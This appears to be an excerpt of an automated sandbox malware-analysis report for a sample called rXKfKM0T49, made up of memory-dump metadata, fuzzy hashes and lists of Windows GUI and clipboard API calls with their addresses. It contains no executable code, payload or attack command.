                                                                                                            • Instruction Fuzzy Hash: AFC1DF74E00218CFEB54DFA5C994BADBBB2AF89300F5080A9D819BB355DB359E81CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2d0fbcb514183dda21a3be0a147f9d06384e832cbf49230955a43c29c74756cd
                                                                                                            • Instruction ID: e24052a3b42d51c8b7446a83015b671ba55f596389a8a5556143a2055149086f
                                                                                                            • Opcode Fuzzy Hash: 2d0fbcb514183dda21a3be0a147f9d06384e832cbf49230955a43c29c74756cd
                                                                                                            • Instruction Fuzzy Hash: F3C1C074E00318CFDB54DFA5C994BADBBB2AF89301F5080A9D419AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b46805f04960237ed121ebc879f99fe7f4e9663ce75ea4d6c32d5edee121abc2
                                                                                                            • Instruction ID: 69332144d4416a2358c884f4a7b252f5cbd93b280712e480cf6c7940ee617a27
                                                                                                            • Opcode Fuzzy Hash: b46805f04960237ed121ebc879f99fe7f4e9663ce75ea4d6c32d5edee121abc2
                                                                                                            • Instruction Fuzzy Hash: ABC1DF74E00318CFDB54DFA5C994BADBBB2AF89301F6080A9D819AB355DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df07be5ef96dd6f1b908e9580d93c718262498707d8d3b7347f595955192e324
                                                                                                            • Instruction ID: 47180b3ffa6baf01d65abe87aa57cb8127d25f2b5fe6fcce175566fb391bcb34
                                                                                                            • Opcode Fuzzy Hash: df07be5ef96dd6f1b908e9580d93c718262498707d8d3b7347f595955192e324
                                                                                                            • Instruction Fuzzy Hash: CBC1DF74E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB365DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a54949a7ef00ed32a80cbe5b1725978235e079689afb90b1913665c6cdb327c2
                                                                                                            • Instruction ID: 53d9ad7a34920afd64b418245f3b9883271743e053ad30edae6c59904f1406d0
                                                                                                            • Opcode Fuzzy Hash: a54949a7ef00ed32a80cbe5b1725978235e079689afb90b1913665c6cdb327c2
                                                                                                            • Instruction Fuzzy Hash: 9AC1BF74E00218CFEB54DFA5C994BADBBB2BF89301F5080A9D419AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd7f9607a1f92d13ef9250ae293576ec9169f7eaec8fe3d4f8c24349186fcf80
                                                                                                            • Instruction ID: c4925e216aa9b903673c1a1e62c07d02d8d17d118dd504e8c64bebae7ecdaf58
                                                                                                            • Opcode Fuzzy Hash: dd7f9607a1f92d13ef9250ae293576ec9169f7eaec8fe3d4f8c24349186fcf80
                                                                                                            • Instruction Fuzzy Hash: CBC1CE74E00218CFDB54DFA9C994B9DBBB2BF89300F6080A9D419AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b6ed3052e25069d49e34d4c024e76696df40a161a1d52858a0c2bba01d92f60e
                                                                                                            • Instruction ID: 2f48018da7641b83314e109801c5deb596d69389746963ecf8a504bd6c45f36a
                                                                                                            • Opcode Fuzzy Hash: b6ed3052e25069d49e34d4c024e76696df40a161a1d52858a0c2bba01d92f60e
                                                                                                            • Instruction Fuzzy Hash: A3C1D074E00318CFDB54DFA5C994B9DBBB2AF89300F6080A9D419AB355EB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7fa34da69227a6602f4c734a49d7273e750b43f05f9c1b99cde27e84b43cd792
                                                                                                            • Instruction ID: dcfa5313b7b32c75a0253732cdc0dbb155cf9d607c41e3b76835e686b018bd9a
                                                                                                            • Opcode Fuzzy Hash: 7fa34da69227a6602f4c734a49d7273e750b43f05f9c1b99cde27e84b43cd792
                                                                                                            • Instruction Fuzzy Hash: 59C1CF74E00318CFDB54DFA5C994BADBBB2AF89301F6080A9D819AB355DB359E85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5bfefa6810ee6639bf13063185004f334f8ba3a323915286f9cab73aa92095e
                                                                                                            • Instruction ID: d396a6cd9760a3014ffb2424f17696b8c4025717af176a3f7a5d872bd4a32d41
                                                                                                            • Opcode Fuzzy Hash: b5bfefa6810ee6639bf13063185004f334f8ba3a323915286f9cab73aa92095e
                                                                                                            • Instruction Fuzzy Hash: 20C1DF74E00318CFDB54DFA9C994B9DBBB2AF89301F6080A9D819AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6b192852ea28416b03685bb183e6bec5168067cef9a1c790ba775d486803626
                                                                                                            • Instruction ID: dc6053dde240e898acd224b66ea403c1b41b30088777479ddd031d3659ee1eb9
                                                                                                            • Opcode Fuzzy Hash: a6b192852ea28416b03685bb183e6bec5168067cef9a1c790ba775d486803626
                                                                                                            • Instruction Fuzzy Hash: AFC1D074E00318CFDB54DFA5C994B9DBBB2AF89300F5080A9D419AB355DB359E81CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 297310a7edd1ffcf6fb0b25588e4fdae3abbf1e99d4a3584e34d30bf975a60af
                                                                                                            • Instruction ID: 721b123736ab33b1c0001591f74055257c45b7cd0746772a6b5e9822417e8ea8
                                                                                                            • Opcode Fuzzy Hash: 297310a7edd1ffcf6fb0b25588e4fdae3abbf1e99d4a3584e34d30bf975a60af
                                                                                                            • Instruction Fuzzy Hash: 68C1D074E00318CFDB54DFA9C994BADBBB2AF89300F5080A9D419AB355EB359E81CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 926963f8bbd090c34cee3e3599718d90b6459e781dfa34608d54cb8bc7d220c3
                                                                                                            • Instruction ID: a94b819275fd3990dda1301530e960cfb7dbc352fab636331f1698bbe395164b
                                                                                                            • Opcode Fuzzy Hash: 926963f8bbd090c34cee3e3599718d90b6459e781dfa34608d54cb8bc7d220c3
                                                                                                            • Instruction Fuzzy Hash: 4DC1CF74E00218CFDB54DFA5C994B9DBBB2AF89301F5080A9D819AB355DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37a7fb93fdee69040262b4a792ee0f20341c2dae4e5a1a22170682d622f324ba
                                                                                                            • Instruction ID: 44ffab1822f91671fb177c3e5a45f34383fc02416e66b5e486ad10ca11d0ea2f
                                                                                                            • Opcode Fuzzy Hash: 37a7fb93fdee69040262b4a792ee0f20341c2dae4e5a1a22170682d622f324ba
                                                                                                            • Instruction Fuzzy Hash: B4C1CF74E00218CFDB54DFA5C994BADBBB2BF89301F6080A9D819AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1baad0086b8fa131016f09700b9cbc6617c669712a6b2dd9c56e47625f758ea4
                                                                                                            • Instruction ID: 102f05716c746088338c3f1693d8a7dec1de091de949d0356e84744d06bfcdc1
                                                                                                            • Opcode Fuzzy Hash: 1baad0086b8fa131016f09700b9cbc6617c669712a6b2dd9c56e47625f758ea4
                                                                                                            • Instruction Fuzzy Hash: D3C1D074E00318CFEB54DFA9C994BADBBB2AF89301F5080A9D419AB355DB359E81CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f09ff109aa11069db4fbb6fa67e93a99cb33a1fea041c859472337fa6a38fc5
                                                                                                            • Instruction ID: 89b5e6e733f04391d9abe9a7dfc1786b108e5083d15788b7c7444e89fd5c2647
                                                                                                            • Opcode Fuzzy Hash: 6f09ff109aa11069db4fbb6fa67e93a99cb33a1fea041c859472337fa6a38fc5
                                                                                                            • Instruction Fuzzy Hash: 61C1CF74E00218CFEB54DFA5C994B9DBBB2BF89301F5080A9D419AB355DB355E81CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5bee7f2d75b8742a3071fd0057514bddbbd3c252dd1a165e16303d287f41790
                                                                                                            • Instruction ID: 3bb106dff5b08cc74b7346e5c24754250254e3fe353f3fc4076644403289891d
                                                                                                            • Opcode Fuzzy Hash: d5bee7f2d75b8742a3071fd0057514bddbbd3c252dd1a165e16303d287f41790
                                                                                                            • Instruction Fuzzy Hash: 8FC1D074E00318CFDB54DFA9C994B9DBBB2AF89301F5080A9D819AB355DB355E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c0ad0bcf082bfd66774fde03558a7e12c3a306e1f0f3f96ba6e6df4d130f8b4
                                                                                                            • Instruction ID: 9b4afda1d28909a15cc75ac37b5f6bdc82868683ae67aa918275cf944a1bb7f3
                                                                                                            • Opcode Fuzzy Hash: 2c0ad0bcf082bfd66774fde03558a7e12c3a306e1f0f3f96ba6e6df4d130f8b4
                                                                                                            • Instruction Fuzzy Hash: 4CC1D074E00318CFDB54DFA5C994BADBBB2AF89301F5080A9D819AB355DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 073207b229952e58660d84c9d5c00c5142f076d6ed503a898597cdf8995d01c7
                                                                                                            • Instruction ID: 9b9562c2530c44cf1ede8dec84e1718cb36c03cadbf087159db288f6ed5bb765
                                                                                                            • Opcode Fuzzy Hash: 073207b229952e58660d84c9d5c00c5142f076d6ed503a898597cdf8995d01c7
                                                                                                            • Instruction Fuzzy Hash: 42C1D074E00318CFDB54DFA9C994B9DBBB2AF89300F6080A9D819AB355DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de1b9c2712d8908bf212ac4801bd5c95567dfc31c0402437d16a0d17b1eac6da
                                                                                                            • Instruction ID: df1c5f9d094db5716cacc6da27174f61f593c10307363ebd79b593dc757e6562
                                                                                                            • Opcode Fuzzy Hash: de1b9c2712d8908bf212ac4801bd5c95567dfc31c0402437d16a0d17b1eac6da
                                                                                                            • Instruction Fuzzy Hash: F3C1DF74E00318CFDB54DFA5C994BADBBB2AF89300F6080A9D819AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07b384b2b0d6d446ee8b0173b5c628dd3a8d5edc1596d5ec0e6cd9c5805a5aed
                                                                                                            • Instruction ID: c8971080390b8a5bf23a005a14a5981abb38801753f7ed8bf9ce689856b59bb6
                                                                                                            • Opcode Fuzzy Hash: 07b384b2b0d6d446ee8b0173b5c628dd3a8d5edc1596d5ec0e6cd9c5805a5aed
                                                                                                            • Instruction Fuzzy Hash: ACC1E174E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB355EB359E85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a7e083893e9373a9198b755525bd54ec3e939e83f5be987c0e70d35b20e1bb7
                                                                                                            • Instruction ID: 8a269952ceb54c0ee4566e6684b42fc1c9d5d58417738cb8b79e9dc1ec1a35c7
                                                                                                            • Opcode Fuzzy Hash: 6a7e083893e9373a9198b755525bd54ec3e939e83f5be987c0e70d35b20e1bb7
                                                                                                            • Instruction Fuzzy Hash: DAC1DF74E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB355EB359E81CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76F93420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
